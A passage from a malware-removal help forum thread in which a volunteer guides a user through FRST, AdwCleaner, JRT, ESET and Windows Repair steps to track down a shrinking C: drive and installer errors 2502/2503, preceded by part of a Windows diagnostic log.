Description: Product: Mumble 1.2.10 -- The installer has encountered an unexpected error installing this package. This may indicate a problem with this package. The error code is 2502. The arguments are: , ,
 
Error: (01/04/2016 10:23:54 AM) (Source: MsiInstaller) (EventID: 10005) (User: LILJOETHEMASTER)
Description: Product: Mumble 1.2.10 -- The installer has encountered an unexpected error installing this package. This may indicate a problem with this package. The error code is 2503. The arguments are: , ,
 
Error: (01/04/2016 10:22:58 AM) (Source: VSS) (EventID: 12305) (User: )
Description: Volume Shadow Copy Service error: Volume/disk not connected or not found.
Error context: DeviceIoControl(\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 - 0000000000000180,0x00530190,0000000000000000,0,00000055E572DB60,4096,[0]).
 
 
Operation:
   Query Shadow Copies
 
Error: (01/04/2016 10:22:22 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.
 
Details:
AddWin32ServiceFiles: Unable to back up image of service Avast Antivirus since QueryServiceConfig API failed
 
System Error:
The system cannot find the file specified.
.
 
Error: (01/04/2016 10:22:22 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.
 
Details:
AddLegacyDriverFiles: Unable to back up image of binary avast! VM Monitor.
 
System Error:
The system cannot find the file specified.
.
 
Error: (01/04/2016 10:22:22 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.
 
Details:
AddLegacyDriverFiles: Unable to back up image of binary aswSP.
 
System Error:
The system cannot find the file specified.
.
 
 
System errors:
=============
Error: (01/04/2016 12:23:13 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The avast! HardwareID service failed to start due to the following error: 
%%2
 
Error: (01/04/2016 12:12:09 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The RealPlayer Update Service service terminated unexpectedly.  It has done this 1 time(s).
 
Error: (01/04/2016 10:12:55 AM) (Source: DCOM) (EventID: 10001) (User: LILJOETHEMASTER)
Description: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:Box.AppXcgnjqf89mss3ge7mq2mhqa303mzrmp23.mca31Box.AppX28dya9jxhxbtnky3mgebbjxma7fvws4j.mcaUnavailableUnavailable
 
Error: (01/04/2016 09:43:04 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Windows Defender Service service failed to start due to the following error: 
%%577
 
Error: (01/04/2016 09:42:39 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Windows Defender Network Inspection Service service failed to start due to the following error: 
%%577
 
Error: (01/04/2016 08:25:21 AM) (Source: DCOM) (EventID: 10005) (User: )
Description: 1084ShellHWDetectionUnavailable{DD522ACC-F821-461A-A407-50B198B896DC}
 
Error: (01/04/2016 08:25:05 AM) (Source: DCOM) (EventID: 10005) (User: )
Description: 1068fdPHostUnavailable{D3DCB472-7261-43CE-924B-0704BD730D5F}
 
Error: (01/04/2016 08:25:05 AM) (Source: DCOM) (EventID: 10005) (User: )
Description: 1068fdPHostUnavailable{145B4335-FE2A-4927-A040-7C35AD3180EF}
 
Error: (01/04/2016 08:25:05 AM) (Source: DCOM) (EventID: 10005) (User: )
Description: 1068netprofmUnavailable{A47979D2-C419-11D9-A5B4-001185AD2B89}
 
Error: (01/04/2016 08:25:05 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Network List Service service depends on the Network Location Awareness service which failed to start because of the following error: 
%%1068
 
 
CodeIntegrity:
===================================
  Date: 2016-01-04 09:43:04.863
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2016-01-04 09:42:39.749
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\services.exe) attempted to load \Device\HarddiskVolume4\Program Files\Windows Defender\NisSrv.exe that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2015-11-19 19:09:21.957
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Sound+\SoundP.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-11-19 19:09:21.504
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Sound+\SoundP.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-07-30 00:05:05.819
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2015-07-30 00:05:04.990
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2015-07-28 21:50:33.962
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2015-07-28 21:50:33.028
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2015-07-28 21:42:27.789
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2015-07-28 21:42:27.186
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Celeron® CPU N2920 @ 1.86GHz
Percentage of memory in use: 62%
Total physical RAM: 3982.27 MB
Available physical RAM: 1504.93 MB
Total Virtual: 4686.27 MB
Available Virtual: 1716.65 MB
 
==================== Drives ================================
 
Drive c: (Windows) (Fixed) (Total:907.68 GB) (Free:831.81 GB) NTFS
Drive d: (RECOVERY) (Fixed) (Total:22.81 GB) (Free:2.22 GB) NTFS ==>[system with boot components (obtained from drive)]
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 57DF2823)
 
Partition: GPT.
 
==================== End of Addition.txt ============================


#7 Liljoethemaster

Liljoethemaster
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:08:25 AM

Posted 04 January 2016 - 10:39 PM

And sorry for the mishap for what I have said. I somewhat had installed AVG PC Tuneup 3 months to test it out and gotten somewhat a decent program but after that I was now dissatisfied not only because I know already about the disk space eaten. And plus yeah I kind of did downloaded AVG Secure Search blatantly dumb for what I did but yet to keep my searches safe. About the PC Tuneup I did uninstall it and if it was the case and eaten my drive that way I didn't realize but it is still kind of keep on going for that reason. I did delete the folders and the program as well but my drive was still decreasing.



#8 thcbytes

thcbytes

  • Malware Response Team
  • 14,790 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:09:25 AM

Posted 04 January 2016 - 10:58 PM

No worries.  :)
 
This next please....

FRST fix:

  • Download this file Attached File  fixlist.txt   14.27KB   6 downloads

Note: It's important that both files, FRST64.exe and fixlist.txt are in the same location or the fix will not work
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

  • Run FRST64.exe and press the Fix button just once and wait
  • If for some reason the tool needs a restart, please make sure you let the system restart normally, then let the tool complete its run
  • When finished, FRST will generate a log (Fixlog.txt) in the same location the tool was run.

Please copy and paste the log in your next reply.

<<<<<<<<<<

I recommend the uninstalling of the below listed program(s).

  • Press windows key Windows_Logo_key.gif + r on your keyboard at the same time
  • Copy/paste appwiz.cpl into the run box and press Enter
  • A list of installed programs will be displayed
  • Uninstall the following by clicking on the program(s) below (and any other similar names) and selecting Remove or Uninstall

Ashampoo WinOptimizer 11 (HKLM-x32\...\{4209F371-8D72-8119-66FA-897D2D41E27F}_is1) (Version: 11.00.70 - Ashampoo GmbH & Co. KG)
AVG SafeGuard toolbar (HKLM-x32\...\AVG SafeGuard toolbar) (Version: 19.1.0.285 - AVG Technologies)
SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 6.0.1204 - SUPERAntiSpyware.com)
Itibiti RTC (x32 Version: 0.0.1 - Itibiti Inc)

  • Reboot your computer

<<<<<<<<<<

Please download AdwCleaner by Xplode onto your desktop.

  • Close all open programs and internet browser
  • Double click on AdwCleaner.exe, click Run, then select I agree if it appears
  • Click Scan
  • Once the scan has completed youi will see Pending. Please check elements you don't want to remove above the progress bar
  • Click on Clean
  • Confirm the cleaning and rebooting of your computer by clicking OK
  • Your computer will be rebooted automatically. A text file will open after the restart

You can find the logfile at C:\AdwCleaner\AdwCleaner.txt

Copy and paste the contents in your reply



<<<<<<<<<<

Next please download Junkware Removal Tool and save it to your desktop.

  • Disable your AntiVirus and AntiSpyware applications, usually via a right click on the System Tray icon. They may otherwise interfere with our tools. (Click on this link to see a list of programs that should be disabled. The list is not all inclusive.)
  • Right-mouse click JRT.exe and select Run as administrator (Windows XP double click the icon)
  • Please allow the program time to run
  • Once completed a Notepad document will open on your desktop

Copy and paste the contents in your reply

<<<<<<<<<<

Re-run FRST, check the Addition.txt box, press SCAN and copy/paste the 2 logs in your next reply.

<<<<<<<<<<

If the logs are too long you can post them over several posts or attach them.

<<<<<<<<<<

How is your computer running? What problems remain?

Regards,
thcbytes


Proud member - Unified Network of Instructors and Trained Eliminators
Posted Image

I do not accept personal donations for assistance provided. I would ask that you instead consider donating the greatest gift - Organ Donation. Your organs are of no use to you when your gone. You will save a life that would otherwise be lost!

http://donatelife.net/register-now/

#9 Liljoethemaster

Liljoethemaster
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:08:25 AM

Posted 11 January 2016 - 03:22 AM

Sorry for the late reply, I done some testing and I did the steps how much I did but since everytime I try to wait and see on my c drive still decreasing. But here are the files and log on this recent date now. And again sorry for the long wait cause last 2 days ago adwcleaner was not responding when I attempt to clean.

 

Attached Files



#10 thcbytes

thcbytes

  • Malware Response Team
  • 14,790 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:09:25 AM

Posted 11 January 2016 - 03:53 PM

Hello again, :)

This next please....

ESET Online Scanner
  • Click here to download the installer for ESET Online Scanner and save it to your Desktop.
  • Right click on esetsmartinstaller_enu.exe and select Run as Administrator.
  • Place a checkmark in YES, I accept the Terms of Use, then click Start. Wait for ESET Online Scanner to load its components.
  • Select Enable detection of potentially unwanted applications.
  • Click Advanced Settings, then place a checkmark in the following:
    • Remove found threats
    • Scan archives
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth technology
  • Click Start to begin scanning.
  • ESET Online Scanner will start downloading signatures and scan. Please be patient, as this scan can take quite some time.
  • When the scan is done, click List threats (only available if ESET Online Scanner found something).
  • Click Export, then save the file to your desktop.
  • Click Back, then Finish to exit ESET Online Scanner.
Next....

Please re-run and post WinDirStat for my review.

Regards,
thcbytes
Proud member - Unified Network of Instructors and Trained Eliminators
Posted Image

I do not accept personal donations for assistance provided. I would ask that you instead consider donating the greatest gift - Organ Donation. Your organs are of no use to you when your gone. You will save a life that would otherwise be lost!

http://donatelife.net/register-now/

#11 Liljoethemaster

Liljoethemaster
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:08:25 AM

Posted 12 January 2016 - 04:28 PM

The scan was too long and btw my other problems remain are my corrupt files with the windows resource protection cause the restorehealth part of dism with the scan that I'm doing is taking way to long. Along with the windows updates randomly failing. But yeah here is my attachment I send already about WinDirStat

Attached Files



#12 thcbytes

thcbytes

  • Malware Response Team
  • 14,790 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:09:25 AM

Posted 12 January 2016 - 04:36 PM

Hello,

 

The scan was too long

 

Please clarify.  Did you not allow the scan to finish?

 

<<<<<<<<<<

 

But yeah here is my attachment I send already about WinDirStat

 

I need a new WinDirStat to compare to the first time you ran it please.  You tell me that your C;\ drive is decreasing.  i want to see how much and where the files are allocated.  Ok?

 

<<<<<<<<<<

 

and btw my other problems remain are my corrupt files with the windows resource protection cause the restorehealth part of dism with the scan that I'm doing is taking way to long

 

Please clarify.  What is taking way too long?

 

Regards,

thcbytes


Proud member - Unified Network of Instructors and Trained Eliminators
Posted Image

I do not accept personal donations for assistance provided. I would ask that you instead consider donating the greatest gift - Organ Donation. Your organs are of no use to you when your gone. You will save a life that would otherwise be lost!

http://donatelife.net/register-now/

#13 Liljoethemaster

Liljoethemaster
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:08:25 AM

Posted 12 January 2016 - 04:53 PM

oh that was the new one i gave not the old. i just put in with the recovery drive in it. and btw the scan I'm doing on the command prompt was the C:\Windows\system32>Dism \Online \cleanup-image \restorehealth that scan I'm doing is taking way to long and it stop at 40%



#14 thcbytes

thcbytes

  • Malware Response Team
  • 14,790 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:09:25 AM

Posted 12 January 2016 - 05:51 PM

Hello,

 

I am still confused.  Where is the ESET scan results?

 

<<<<<<<<<<

 

I didn't ask you to do this...

 

btw the scan I'm doing on the command prompt was the C:\Windows\system32>Dism \Online \cleanup-image \restorehealth

 

Could you please hold off and only do as I ask for now?

 

<<<<<<<<<<
 
Please do this now...

Tweaking.com - Windows Repair All-In-One (Portable)

- Download Windows Repair All-In-One (Portable Version) from here.

- Extract tweaking.com_windows_repair_aio.zip to your Desktop.

- Disable all your antivirus and antimalware software - see how to do that here.
- Right click on QfBzvq1.png and select Run as Administrator (XP users just double click) to start Windows Repair All-In-One.
(Windows Vista/7/8 users: Accept UAC warning if it is enabled.)

- A window will appear. Click Step 2.
2f8o60N.png

- Click the Open Pre-Scan button, then click Start Scan. Wait for Windows Repair to finish scanning.

- Depending on which error Windows Repair found, click Repair Reparse Point or Repair Environment Variable accordingly. When the button changes to "Done!", click the close button to return to Windows Repair.

- Go to Step 3, then click Check in the See If Check Disk Is Needed.

- If Windows Repair stated that errors are found, click Open Check Disk At Next Boot. Choose (/R) Fixes errors on the disk also locate bad sectors and recovers readable information, then click Add To Next Boot. Reboot the computer to let Windows check the disk.
Ymy7crZ.png

- Go to Step 4, then click Do It.
zDtdN75.png

- Go to Step 5. Under System Restore click Create.
f7lEe1N.png

- Go to Repairs and click Open Repairs. Leave all checkmarks as they are, then click Start Repairs.
PGv2vtD.png

- By default Windows Repair All-In-One will create a "Logs" folder in its folder on the Desktop. Please post the contents of the log in your next reply.

How is your computer running now?  Please answer my questions above.

Regards,
thcbytes


Proud member - Unified Network of Instructors and Trained Eliminators
Posted Image

I do not accept personal donations for assistance provided. I would ask that you instead consider donating the greatest gift - Organ Donation. Your organs are of no use to you when your gone. You will save a life that would otherwise be lost!

http://donatelife.net/register-now/

#15 Liljoethemaster

Liljoethemaster
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:08:25 AM

Posted 19 January 2016 - 06:07 AM

I'm so much agitated and I still ain't got no luck with my C Drive and plus two problems remaining is my installer error 2503 2502 and the C drive health.
And btw THC even if I start and launch tweakingrepairs as I did, the pre-scan always get into a message saying. TweakingRepairs has stopped working as same as the AdwCleaner in those days ago and I ain't got no luck to work it and to run it as a administrator. And btw here is the scan results from ESET. I'm really get antsy and friggin pissed as it is and I'm slowly losing my bleep mind.

 

Attached Files






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users